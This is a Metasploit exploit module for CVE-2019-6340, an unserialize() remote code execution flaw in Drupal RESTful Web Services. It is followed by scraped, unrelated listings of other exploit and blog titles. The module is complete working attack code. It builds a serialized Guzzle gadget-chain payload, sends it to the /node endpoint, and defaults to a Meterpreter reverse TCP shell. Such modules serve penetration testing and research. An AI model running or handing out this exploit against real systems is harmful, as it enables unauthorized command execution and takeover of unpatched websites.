##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  # NOTE: All (four) Web Services modules need to be enabled

  Rank = NormalRanking

  include Msf::Exploit::Remote::HTTP::Drupal

  def initialize(info = {})

    super(update_info(info,

      'Name'               => 'Drupal RESTful Web Services unserialize() RCE',

      'Description'        => %q{

        This module exploits a PHP unserialize() vulnerability in Drupal RESTful

        Web Services by sending a crafted request to the /node REST endpoint.

        As per SA-CORE-2019-003, the initial remediation was to disable POST,

        PATCH, and PUT, but Ambionics discovered that GET was also vulnerable

        (albeit cached). Cached nodes can be exploited only once.

        Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of

        this alternate vector.

        Drupal < 8.5.11 and < 8.6.10 are vulnerable.

      },

      'Author'             => [

        'Jasper Mattsson', # Discovery

        'Charles Fol',     # PoC

        'Rotem Reiss',     # Module

        'wvu'              # Module

      ],

      'References'         => [

        ['CVE', '2019-6340'],

        ['URL', 'https://www.drupal.org/sa-core-2019-003'],

        ['URL', 'https://www.drupal.org/psa-2019-02-22'],

        ['URL', 'https://www.ambionics.io/blog/drupal8-rce'],

        ['URL', 'https://github.com/ambionics/phpggc'],

        ['URL', 'https://twitter.com/jcran/status/1099206271901798400']

      ],

      'DisclosureDate'     => '2019-02-20',

      'License'            => MSF_LICENSE,

      'Platform'           => ['php', 'unix'],

      'Arch'               => [ARCH_PHP, ARCH_CMD],

      'Privileged'         => false,

      'Targets'            => [

        ['PHP In-Memory',

          'Platform'       => 'php',

          'Arch'           => ARCH_PHP,

          'Type'           => :php_memory,

          'Payload'        => {'BadChars' => "'"},

          'DefaultOptions' => {

            'PAYLOAD'      => 'php/meterpreter/reverse_tcp'

          }

        ],

        ['Unix In-Memory',

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Type'           => :unix_memory,

          'DefaultOptions' => {

            'PAYLOAD'      => 'cmd/unix/generic',

            'CMD'          => 'id'

          }

        ]

      ],

      'DefaultTarget'      => 0,

      'Notes'              => {

        'Stability'        => [CRASH_SAFE],

        'SideEffects'      => [IOC_IN_LOGS],

        'Reliablity'       => [UNRELIABLE_SESSION], # When using the GET method

        'AKA'              => ['SA-CORE-2019-003']

      }

    ))

    register_options([

      OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',

                            ['GET', 'POST', 'PATCH', 'PUT']]),

      OptInt.new('NODE',    [false, 'Node ID to target with GET method', 1])

    ])

    register_advanced_options([

      OptBool.new('ForceExploit', [false, 'Override check result', false])

    ])

  end

  def check

    checkcode = CheckCode::Unknown

    version = drupal_version

    unless version

      vprint_error('Could not determine Drupal version')

      return checkcode

    end

    if version.to_s !~ /^8\b/

      vprint_error("Drupal #{version} is not supported")

      return CheckCode::Safe

    end

    vprint_status("Drupal #{version} targeted at #{full_uri}")

    checkcode = CheckCode::Detected

    changelog = drupal_changelog(version)

    unless changelog

      vprint_error('Could not determine Drupal patch level')

      return checkcode

    end

    case drupal_patch(changelog, 'SA-CORE-2019-003')

    when nil

      vprint_warning('CHANGELOG.txt no longer contains patch level')

    when true

      vprint_warning('Drupal appears patched in CHANGELOG.txt')

      checkcode = CheckCode::Safe

    when false

      vprint_good('Drupal appears unpatched in CHANGELOG.txt')

      checkcode = CheckCode::Appears

    end

    # Any further with GET and we risk caching the targeted node

    return checkcode if meth == 'GET'

    # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable

    token = Rex::Text.rand_text_alphanumeric(8..42)

    res   = execute_command("echo #{token}")

    return checkcode unless res

    if res.body.include?(token)

      vprint_good('Drupal is vulnerable to code execution')

      checkcode = CheckCode::Vulnerable

    end

    checkcode

  end

  def exploit

    if [CheckCode::Safe, CheckCode::Unknown].include?(check)

      if datastore['ForceExploit']

        print_warning('ForceExploit set! Exploiting anyway!')

      else

        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')

      end

    end

    if datastore['PAYLOAD'] == 'cmd/unix/generic'

      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')

      # XXX: Naughty datastore modification

      datastore['DUMP_OUTPUT'] = true

    end

    case target['Type']

    when :php_memory

      # XXX: This will spawn a *very* obvious process

      execute_command("php -r '#{payload.encoded}'")

    when :unix_memory

      execute_command(payload.encoded)

    end

  end

  def execute_command(cmd, opts = {})

    vprint_status("Executing with system(): #{cmd}")

    # https://en.wikipedia.org/wiki/Hypertext_Application_Language

    hal_json = JSON.pretty_generate(

      'link'      => [

        'value'   => 'link',

        'options' => phpggc_payload(cmd)

      ],

      '_links'    => {

        'type'    => {

          'href'  => vhost_uri

        }

      }

    )

    print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}")

    res = send_request_cgi({

      'method'   => meth,

      'uri'      => node_uri,

      'ctype'    => 'application/hal+json',

      'vars_get' => {'_format' => 'hal_json'},

      'data'     => hal_json

    }, 3.5)

    return unless res

    case res.code

    # 401 isn't actually a failure when using the POST method

    when 200, 401

      print_line(res.body) if datastore['DUMP_OUTPUT']

      if meth == 'GET'

        print_warning('If you did not get code execution, try a new node ID')

      end

    when 404

      print_error("#{node_uri} not found")

    when 405

      print_error("#{meth} method not allowed")

    when 422

      print_error('VHOST may need to be set')

    when 406

      print_error('Web Services may not be enabled')

    else

      print_error("Unexpected reply: #{res.inspect}")

    end

    res

  end

  # phpggc Guzzle/RCE1 system id

  def phpggc_payload(cmd)

    (

      # http://www.phpinternalsbook.com/classes_objects/serialization.html

      <<~EOF

        O:24:"GuzzleHttp\\Psr7\\FnStream":2:{

          s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{

            s:5:"close";a:2:{

              i:0;O:23:"GuzzleHttp\\HandlerStack":3:{

                s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";

                  s:cmd_len:"cmd";

                s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";

                  a:1:{i:0;a:1:{i:0;s:6:"system";}}

                s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";

                  b:0;

              }

              i:1;s:7:"resolve";

            }

          }

          s:9:"_fn_close";a:2:{

            i:0;r:4;

            i:1;s:7:"resolve";

          }

        }

      EOF

    ).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)

  end

  def meth

    datastore['METHOD'] || 'POST'

  end

  def node

    datastore['NODE'] || 1

  end

  def node_uri

    if meth == 'GET'

      normalize_uri(target_uri.path, '/node', node)

    else

      normalize_uri(target_uri.path, '/node')

    end

  end

  def vhost_uri

    full_uri(

      normalize_uri(target_uri.path, '/rest/type/shortcut/default'),

      vhost_uri: true

    )

  end

end

[EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. WebStorm 11、PhpStorm 10免费激活(不需要注册码)

    之前分享的WebStorm9.WebStrom10.PhpStorm9注册码生成网站已经被站长关了,比较遗憾!http://my.oschina.net/ximidao/blog/486353 现在官 ...

  4. 下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y),y++);

    下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y) ...

  5. ssh The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established

    The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established. ECDSA key fingerprint is SH ...

  6. jenkins git can't work ERROR: Timeout after 10 minutes ERROR: Error fetching remote repo 'origin'

    Started by user Allen Running as Allen Building remotely on MISTestSrv2 (MIS) in workspace C:\jenkin ...

  7. 10 Future Web Trends 十大未来互联网趋势

    转载自:http://blog.sina.com.cn/s/blog_4be577310100ajpb.html 我们很满意自己进入的当前网络纪元,通常被称为Web 2.0.这个阶段互联网的特征包括搜 ...

  8. CXF(2.7.10) - RESTful Services, JSON Support

    在 CXF(2.7.10) - RESTful Services 介绍了 REST 风格的 WebService 服务,数据传输是基于 XML 格式的.如果要基于 JSON 格式传输数据,仅需要将注解 ...

  9. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

随机推荐

  1. 20175314 《Java程序设计》迭代和JDB

    20175314 <Java程序设计>迭代和JDB 要求 1 使用C(n,m)=C(n-1,m-1)+C(n-1,m)公式进行递归编程实现求组合数C(m,n)的功能 2 m,n 要通过命令 ...

  2. Codeforces Round #497 (Div. 2)

    Codeforces Round #497 (Div. 2) https://codeforces.com/contest/1008 A #include<bits/stdc++.h> u ...

  3. 41 【docker】初识

    常用的docker命令: docker ps #查看当前正在运行的容器 docker ps -a | grep <keyword> #查看所有的容器,运行的或者停止的 docker sto ...

  4. 第一个用IDEA写的程序——“前言中不允许有内容”

    "前言中不允许有内容" 这是用IDEA写的第一个程序-- 它出现了一些问题 让人很难过 希望有人可以帮助解答,谢谢 程序是这样子的 运行完是这样显示的

  5. react 子元素修改父元素值的一个偏方,虽然简单,但是不建议用,

    this.state.obj = { name: "小明" } <Zizujian obj={this.state.obj} /> // 子组件这样修改父元素的值 // ...

  6. AUTEL MaxiSys MS908S Pro MS908SP Diagnostic Platform

    AUTEL MaxiSys MS908S Pro Description : One of the MaxiSys series devices, the MS908S Pro Diagnostic ...

  7. 阿里云ECS装LAMP环境

    学生计划9.9买个一个ECS,要做PHP开发,所以搭建一个Lamp的环境 1.使用镜像,附件 sh-1.5.5附于文后. 2.一键安装 2.1 输入命令:chmod –R 777 sh-1.5.5 c ...

  8. Python(四) 列表元组

  9. 201771010142 张燕《面向对象程序设计(java)》第一周学习总结

    201771010142 张燕<面向对象程序设计(java)>第一周学习总结 第一部分:课程准备部分 填写课程学习 平台注册账号, 平台名称 注册账号 博客园:www.cnblogs.co ...

  10. HQL-Query接口

    org.hibernate.Query接口 1.Query接口定义有执行查询的方法(完成HQL语句的解析和执行过程并返回查询结果,就像SQL语句没了JDBC接口就成了一个普通的字符串变量) 2.Que ...